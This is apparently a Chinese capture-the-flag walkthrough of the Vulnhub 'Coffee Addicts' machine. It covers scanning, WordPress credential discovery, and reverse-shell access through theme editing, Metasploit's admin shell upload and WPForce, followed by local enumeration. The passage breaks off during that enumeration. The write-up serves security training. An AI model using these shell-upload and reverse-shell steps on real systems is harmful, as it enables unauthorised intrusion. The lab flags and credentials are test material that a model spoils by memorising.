首页 > 其他分享 >【Vulnhub 靶场】【Coffee Addicts: 1】【简单-中等】【20210520】

【Vulnhub 靶场】【Coffee Addicts: 1】【简单-中等】【20210520】

时间:2023-11-29 23:24:38浏览次数:52  
标签:bin Coffee 20210520 www Addicts gus coffeeaddicts usr root

1、环境介绍

靶场介绍https://www.vulnhub.com/entry/coffee-addicts-1,699/

靶场下载https://download.vulnhub.com/coffeeaddicts/coffeeaddicts.ova

靶场难度:简单 - 中等

发布日期:2021年5月20日

文件大小:1.3 GB

靶场作者:BadByte

靶场描述

  • 我们的咖啡店被黑客入侵了!!你能修复损坏并找出是谁干的吗?
  • 与VMware相比,这在VirtualBox中效果更好

打靶耗时:6+小时,整体还算顺畅,唯一卡顿就在找密码上,还有一处误导(不知道算不算)?

打靶关键

  1. HTML 静态阅读
  1. WordPress 如何 GetShell
  1. id_rsa 密码爆破 或 SSH 密码爆破
  1. Linux信息收集、C++代码阅读、SUOD提权

2、主机发现与端口扫描

(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 08:00:27:cb:7e:f5, IPv4: 192.168.56.3
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    3a:f9:d3:90:a4:64       (Unknown: locally administered)
192.168.56.44   08:00:27:af:a3:17       PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.358 seconds (108.57 hosts/sec). 2 responded
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.56.44
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-29 01:49 EST
Nmap scan report for 192.168.56.44
Host is up (0.00053s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fc:13:6a:6b:9b:e3:68:18:24:a1:de:2b:28:1e:61:5f (RSA)
|   256 c1:34:94:94:71:71:9c:6e:83:a6:be:c9:2a:1b:3f:d7 (ECDSA)
|_  256 9a:cc:ce:ce:b8:2f:08:bb:2b:99:b6:25:3f:ec:44:61 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:AF:A3:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.56.44

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.14 seconds

3、端口访问

3.1、22端口 - SSH

  • 初步访问,看看有没有什么可用的提示信息
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# ssh 192.168.56.44
The authenticity of host '192.168.56.44 (192.168.56.44)' can·t be established.
ED25519 key fingerprint is SHA256:BWCczj8AdNhb8SBbp5fPUKT8SekaWiJXGqMl+3+pLy0.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.44' (ED25519) to the list of known hosts.
[email protected]·s password: 
Permission denied, please try again.
[email protected]·s password: 
Permission denied, please try again.
[email protected]·s password: 
[email protected]: Permission denied (publickey,password).

3.2、80端口 - Web

  • 获取域名:coffeeaddicts.thm
  • 获取关键字:ErrorCauseryee yee assBTC
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# curl http://192.168.56.44/          
ADD coffeeaddicts.thm to your /etc/hosts
  • 添加 hosts
(base) ┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# cat /etc/hosts                                                                         
127.0.0.1       localhost
127.0.1.1       kali
......
192.168.56.44 coffeeaddicts.thm
  • Base64解码
    • im_the_lizard_king 可能包含用户名
    • youtube 打不开,这里就不访问了
┌──(root㉿kali)-[~] (๑•̀ㅂ•́)و✧ 
└─# echo 'VEhNe2ltX3RoZV9saXphcmRfa2luZ30gaHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g/dj1kUXc0dzlXZ1hjUQ==' | base64 -d
THM{im_the_lizard_king} https://www.youtube.com/watch?v=dQw4w9WgXcQ
  • 注释,获取代码
<!-- code taken from https://github.com/Nomy/Hacked-Website-Template -->

4、子域名扫描(没有扫到)

  • 添加了域名,就可能包含子域名
ksubdomain enum -d coffeeaddicts.thm
gobuster dns -d coffeeaddicts.thm -r 192.168.56.44:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 256
gobuster vhost -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --append-domain --timeout 60s --random-agent -q | grep "Status: 200"

5、目录扫描

  • 又是一个 WordPress
# 基础小字典,初扫摸底
dirb http://coffeeaddicts.thm
# 较全面 conda activate py37
dirsearch -u http://coffeeaddicts.thm -t 64 -e *
# 包含静态检查 conda activate py310
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://coffeeaddicts.thm" -j yes -b yes
# 较全面 Plus conda activate py39
cd ~/soft/dirmap ; python3 dirmap.py -i http://coffeeaddicts.thm -lcf
# 常规文件扫描
gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# 可执行文件扫描
gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# 压缩包,备份扫描
gobuster dir -u http://coffeeaddicts.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,txt,old,temp -e -k -r -q
  • http://coffeeaddicts.thm/index.html
  • http://coffeeaddicts.thm/badbyte.png
  • http://coffeeaddicts.thm/wordpress/
  • http://coffeeaddicts.thm/wordpress/wp-admin/

6、WordPress CMS 扫描

  • 发现用户:gus
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# wpscan --url http://coffeeaddicts.thm/wordpress/ --ignore-main-redirect --force -e --plugins-detection aggressive
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | ·_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://coffeeaddicts.thm/wordpress/ [192.168.56.44]
[+] Started: Wed Nov 29 03:36:48 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://coffeeaddicts.thm/wordpress/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://coffeeaddicts.thm/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://coffeeaddicts.thm/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://coffeeaddicts.thm/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.7.1 identified (Insecure, released on 2021-04-15).
 | Found By: Rss Generator (Passive Detection)
 |  - http://coffeeaddicts.thm/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=5.7.1</generator>
 |  - http://coffeeaddicts.thm/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=5.7.1</generator>

[+] WordPress theme in use: coffee-time
 | Location: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/
 | Latest Version: 2.1.8 (up to date)
 | Last Updated: 2019-07-25T00:00:00.000Z
 | Readme: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/readme.txt
 | Style URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/style.css?ver=5.7.1
 | Style Name: Coffee Time
 | Style URI: https://strabelli.com/roberto/temaswordpress/
 | Description: Coffee Time is a minimalist, soft, smooth and responsive WordPress theme with device-agnostic layout...
 | Author: Roberto Strabelli
 | Author URI: https://roberto.strabelli.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/style.css?ver=5.7.1, Match: 'Version: 2.1.8'

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:10 <===========================================================> (6539 / 6539) 100.00% Time: 00:00:10
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:00 <=============================================================> (624 / 624) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] No themes Found.

[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <===========================================================> (2575 / 2575) 100.00% Time: 00:00:03

[i] No Timthumbs Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <==============================================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating DB Exports (via Passive and Aggressive Methods)
 Checking DB Exports - Time: 00:00:00 <====================================================================> (71 / 71) 100.00% Time: 00:00:00

[i] No DB Exports Found.

[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
 Brute Forcing Attachment IDs - Time: 00:00:00 <=========================================================> (100 / 100) 100.00% Time: 00:00:00

[i] Medias(s) Identified:

[+] http://coffeeaddicts.thm/wordpress/?attachment_id=10
 | Found By: Attachment Brute Forcing (Aggressive Detection)

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] gus
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Wed Nov 29 03:37:10 2023
[+] Requests Done: 10103
[+] Cached Requests: 8
[+] Data Sent: 2.963 MB
[+] Data Received: 1.514 MB
[+] Memory used: 261.875 MB
[+] Elapsed time: 00:00:22
  • http://coffeeaddicts.thm/wordpress/xmlrpc.php
  • http://coffeeaddicts.thm/wordpress/readme.html
  • http://coffeeaddicts.thm/wordpress/wp-content/uploads/
  • http://coffeeaddicts.thm/wordpress/wp-cron.php
  • http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/readme.txt
  • http://coffeeaddicts.thm/wordpress/?attachment_id=10

6.1、密文解码(没解出来)

dc6b218a37f27e0f2b33aee11f7adfd2

7、下载的代码解析(好像也没有啥有用信息)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# git clone https://github.com/Nomy/Hacked-Website-Template
正克隆到 'Hacked-Website-Template'...
remote: Enumerating objects: 9, done.
remote: Total 9 (delta 0), reused 0 (delta 0), pack-reused 9
接收对象中: 100% (9/9), 完成.
处理 delta 中: 100% (1/1), 完成.

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cd Hacked-Website-Template 
                                                                                                                                             
(base) ┌──(root㉿kali)-[~/soft/hack/Hacked-Website-Template] (๑•̀ㅂ•́)و✧ 
└─# ls -al
总计 16
drwxr-xr-x 3 root root 4096 11月29日 03:08 .
drwxr-xr-x 3 root root 4096 11月29日 03:08 ..
drwxr-xr-x 8 root root 4096 11月29日 03:08 .git
-rw-r--r-- 1 root root  798 11月29日 03:08 index.html

7.1、index.html

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# cat Hacked-Website-Template/index.html                                         
<html>
<head>
    <title>Hacked by D3W3Y</title>
    <style>
        iframe { display: none; }
    </style>
</head>

<body background="https://i.imgur.com/5rZ91h5.gif">
<iframe width="200" height="113" src="https://www.youtube.com/embed/hZsaPu-kthY?playlist=hZsaPu-kthY&amp;autoplay=1&amp;loop=1&amp;rel=0&amp;controls=0&amp;showinfo=0" frameborder="0" allowfullscreen></iframe>
<center>
    <h1 style=color:red;>(? ?? ? ??)? D0 Y0U W4NN4 PL4Y A G4M3 ? (?? ? ??? )</h1>
    <h2 style=color:green;>This website is H4CK3D by D3W3Y.</h2>
    <img src="https://i.imgur.com/OhoiDOT.png">
    <h3 style=color:grey;>*****地獄 CYBER PIRATES******</h3>
    <p style=color:grey;>Greetz to --> ezirprus, revaer luos, yzeets, yajyaj, ximer, erifdliw, selym, yeda, zalbzaw, ongap, ymon</p>
</center>
</body>
</html>
  • 字符串替换(应该也算是密文解码吧)
    • [0] → [o]
    • [4] → [a]
    • [3] → [e]
D0 Y0U W4NN4 PL4Y A G4M3 ?
do you wanna play a game ?
你想玩个游戏吗?
This website is H4CK3D by D3W3Y.
This website is HACKED by DEWEY.
这个网站被DEWEY破坏了。

7.2、.git 文件

  • 最早版本

<html>
<head>
	<embed src="https://www.youtube.com/v/hZsaPu-kthY&hl=en_US&loop=1&feature=related&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
	<title>Hacked by D3w3y</title>
</head>

<body background="https://i.imgur.com/5rZ91h5.gif"></body>
<center>
	<h1 style=color:red;>(? ?? ? ??)? d0 y0u w4nn4 pl4y 4 64m3 ? (?? ? ??? )  </h1>
	<h2 style=color:green;>d15 w3b5173 15 h4ck3d by D3w3y.</h4>
  <img  src="https://i.imgur.com/OhoiDOT.png">
  <h3 style=color:grey; >*****地獄 CYBER PIRATES******</h1>
  <p style=color:grey; >Greetz to--> ezirprus, revaer luos, yzeets, yajyaj, ximer, erifdliw, selym, yeda, zalbzaw, ongap, ymon</p>
</center>
</html>
  • 字符串替换
    • [0] → [o]
    • [1] → [i]
    • [3] → [e]
    • [4] → [a]
    • [5] → [s]
    • [6] → [g]
    • [7] → [t]
d0 y0u w4nn4 pl4y 4 64m3 ?
do you wanna play a game ?
你想玩个游戏吗?
d15 w3b5173 15 h4ck3d by D3w3y.
dis website is hacked by Dewey.
dis网站被dewey入侵。

8、静态检测

  • 当前可用信息不足,回头重新审视博客内容

8.1、HTML静态检查

  • 疑似用户密码:gus : gus i need you back

8.2、JS静态检测

(base) ┌──(root㉿kali)-[~/SecretFinder] (๑•̀ㅂ•́)و✧ 
└─# python3 SecretFinder.py -i http://coffeeaddicts.thm/wordpress/ -e -g 'jquery;bootstrap;api.google.com' -o cli
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/js/navigation.js?ver=20151215
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/js/skip-link-focus-fix.js?ver=20151215
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/js/showhide.js?ver=5.7.1
[ + ] URL: http://coffeeaddicts.thm/wordpress/wp-includes/js/wp-embed.min.js?ver=5.7.1

9、尝试登录

9.1、WordPress 登录

  • 直接尝试(失败)

  • 尝试去掉空格(成功)

9.2、SSH 登录(失败)

(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# ssh [email protected]     
[email protected]·s password: 
Permission denied, please try again.
[email protected]·s password: 
Permission denied, please try again.
[email protected]·s password: 
[email protected]: Permission denied (publickey,password).

10、上传 PHP 反弹连接(三个方法选其一即可)

10.1、方法一:修改主题(实操)

  • 找到绝对路径
# 之前 CMD 扫描,找到了当前主题路径
# theme=coffee-time
http://coffeeaddicts.thm/wordpress/wp-admin/theme-editor.php?theme=coffee-time&Submit=Select
http://coffeeaddicts.thm/wordpress/wp-content/themes/coffee-time/readme.txt

# 合理类推
# theme=twentynineteen
http://coffeeaddicts.thm/wordpress/wp-admin/theme-editor.php?theme=twentynineteen&Submit=Select
http://coffeeaddicts.thm/wordpress/wp-content/themes/twenty-nineteen/404.php

10.2、方法二:MSF

msfconsole
msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS 192.168.56.44
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set VHOST coffeeaddicts.thm
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST 192.168.56.3
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT 10086
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME gue
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD gusineedyouback
msf6 exploit(unix/webapp/wp_admin_shell_upload) > run

10.3、方法三:脚本

git clone https://github.com/n00py/WPForce
cd WPForce
# 用户密码爆破
python wpforce.py -i users.txt -w pwdlist.txt -u "http://www.targetsite.com"
# 获取用户密码后,获取 WebShell
python yertle.py -u gue -p gusineedyouback -t http://coffeeaddicts.thm/wordpress/ --interactive

11、信息收集

# 触发反弹连接
http://coffeeaddicts.thm/wordpress/wp-content/themes/twenty-nineteen/404.php
(base) ┌──(root㉿kali)-[~/soft/hack] (๑•̀ㅂ•́)و✧ 
└─# nc -lvnp 7890 
listening on [any] 7890 ...
connect to [192.168.56.3] from (UNKNOWN) [192.168.56.44] 56610
Linux CoffeeAdicts 4.15.0-140-generic #144-Ubuntu SMP Fri Mar 19 14:12:35 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 02:49:09 up  5:09,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ SHELL=/bin/bash script -q /dev/null
www-data@CoffeeAdicts:/$

11.1、基本信息收集

  • 存在可利用版本漏洞
www-data@CoffeeAdicts:/$ history
history
    1  history
www-data@CoffeeAdicts:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@CoffeeAdicts:/$ sudo -l
sudo -l
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

Sorry, try again.
[sudo] password for www-data: 

sudo: 3 incorrect password attempts
www-data@CoffeeAdicts:/$ /usr/sbin/getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
www-data@CoffeeAdicts:/$ crontab -l
crontab -l
no crontab for www-data
www-data@CoffeeAdicts:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
www-data@CoffeeAdicts:/$ hostnamectl
hostnamectl
   Static hostname: CoffeeAdicts
         Icon name: computer-vm
           Chassis: vm
        Machine ID: 3f18d050ac1b4b5699c88df3be1114f9
           Boot ID: d3df9b52085a4f7ba53c6d06fd0e76f7
    Virtualization: oracle
  Operating System: Ubuntu 18.04.5 LTS
            Kernel: Linux 4.15.0-140-generic
      Architecture: x86-64
www-data@CoffeeAdicts:/$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@CoffeeAdicts:/$ echo $BASH_VERSION
echo $BASH_VERSION
4.4.20(1)-release
www-data@CoffeeAdicts:/$ ifconfig
ifconfig
enp0s3: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.56.44  netmask 255.255.255.0  broadcast 192.168.56.255
        inet6 fe80::a00:27ff:feaf:a317  prefixlen 64  scopeid 0x20<link>
        ether 08:00:27:af:a3:17  txqueuelen 1000  (Ethernet)
        RX packets 5778351  bytes 897140291 (897.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 6849981  bytes 2496381812 (2.4 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 57269  bytes 4129804 (4.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 57269  bytes 4129804 (4.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

11.2、文件信息收集

11.2.1、/etc/passwd 信息

  • 两个用户:gusbadbyte
www-data@CoffeeAdicts:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
gus:x:1000:1000:gus,,,:/home/gus:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
badbyte:x:1001:1001:,,,:/home/badbyte:/bin/bash

11.2.2、特权文件

  • 可利用漏洞:polkit-agent-helper-1
www-data@CoffeeAdicts:/$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
/bin/mount
www-data@CoffeeAdicts:/$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/umount
/bin/ping
/bin/fusermount
/bin/mount

11.2.3、用户相关文件

  • 可能是黑客的名字:Nicolas Fritzges
  • 发现可疑文件夹:/opt/BadByte
    • 发现ROOT权限执行命令脚本:shell
www-data@CoffeeAdicts:/$ find / -user gus 2>/dev/null
find / -user gus 2>/dev/null
/home/gus
/home/gus/.local
/home/gus/.local/share
/home/gus/.profile
/home/gus/.bashrc
/home/gus/.bash_history
/home/gus/readme.txt
/home/gus/.sudo_as_admin_successful
/home/gus/.cache
/home/gus/.gnupg
/home/gus/user.txt
/home/gus/.bash_logout
www-data@CoffeeAdicts:/$ find / -user badbyte 2>/dev/null
find / -user badbyte 2>/dev/null
/home/badbyte
/home/badbyte/.profile
/home/badbyte/.bashrc
/home/badbyte/.bash_history
/home/badbyte/.cache
/home/badbyte/.gnupg
/home/badbyte/.bash_logout
www-data@CoffeeAdicts:/$ find / -iname *gus* 2>/dev/null
find / -iname *gus* 2>/dev/null
/usr/src/linux-headers-4.15.0-140-generic/include/config/ir/igorplugusb.h
/usr/src/linux-headers-4.15.0-140/include/sound/gus.h
/usr/src/linux-headers-4.15.0-140/sound/isa/gus
/usr/share/zoneinfo/posix/Asia/Famagusta
/usr/share/zoneinfo/Asia/Famagusta
/usr/share/zoneinfo/right/Asia/Famagusta
/lib/modules/4.15.0-140-generic/kernel/drivers/media/rc/igorplugusb.ko
/proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
/home/gus
www-data@CoffeeAdicts:/$ find / -iname *badbyte* 2>/dev/null
find / -iname *badbyte* 2>/dev/null
/opt/BadByte
/var/www/coffeeaddicts.thm/public_html/badbyte.png
/home/badbyte
www-data@CoffeeAdicts:/$ cat /home/gus/user.txt
cat /home/gus/user.txt
THM{s4v3_y0uR_Cr3d5_b0i}
www-data@CoffeeAdicts:/$ cat /home/gus/readme.txt
cat /home/gus/readme.txt
hello, admin.
你好,管理员。
as you can see your site has been hacked, any attempt of fixing it is futile, as we removed you from the sudoers and we changed the root password.
正如你所看到的,你的网站已经被黑客入侵,任何修复它的尝试都是徒劳的,因为我们将你从sudoers中删除,并更改了根密码。
~Nicolas Fritzges
www-data@CoffeeAdicts:/$ cd /opt/BadByte
cd /opt/BadByte
www-data@CoffeeAdicts:/opt/BadByte$ ls -al
ls -al
total 32
drwxr-xr-x 2 root root  4096 Apr  7  2021 .
drwxr-xr-x 3 root root  4096 Apr  6  2021 ..
-rw-r--r-- 1 root root  1024 Apr  6  2021 .shell.cpp.swp
-rwxr-xr-x 1 root root 13816 Apr  6  2021 shell
-rw-r--r-- 1 root root   325 Apr  6  2021 shell.cpp
www-data@CoffeeAdicts:/opt/BadByte$ cat shell.cpp
cat shell.cpp
#include <iostream>
#include <string>
#include <stdio.h>
#include <stdlib.h>
#include <cstring>
using namespace std;
int main() {

while(1){
string command;
cout << "BadByte # ";
cin >> command;
char cstr[command.size() + 1];
strcpy(cstr, command.c_str());
system(cstr);
//cout << "BadByte # " << command;
}
    return 0;
}
  • 着重检查用户相关文件「badbyte」
www-data@CoffeeAdicts:/$ cd /home/gus
cd /home/gus
www-data@CoffeeAdicts:/home/gus$ ls -al
ls -al
total 44
drwxr-xr-x 5 gus  gus  4096 Apr  6  2021 .
drwxr-xr-x 4 root root 4096 Apr  6  2021 ..
-rw------- 1 gus  gus    13 Apr  6  2021 .bash_history
-rw-r--r-- 1 gus  gus   220 Apr  6  2021 .bash_logout
-rw-r--r-- 1 gus  gus  3771 Apr  6  2021 .bashrc
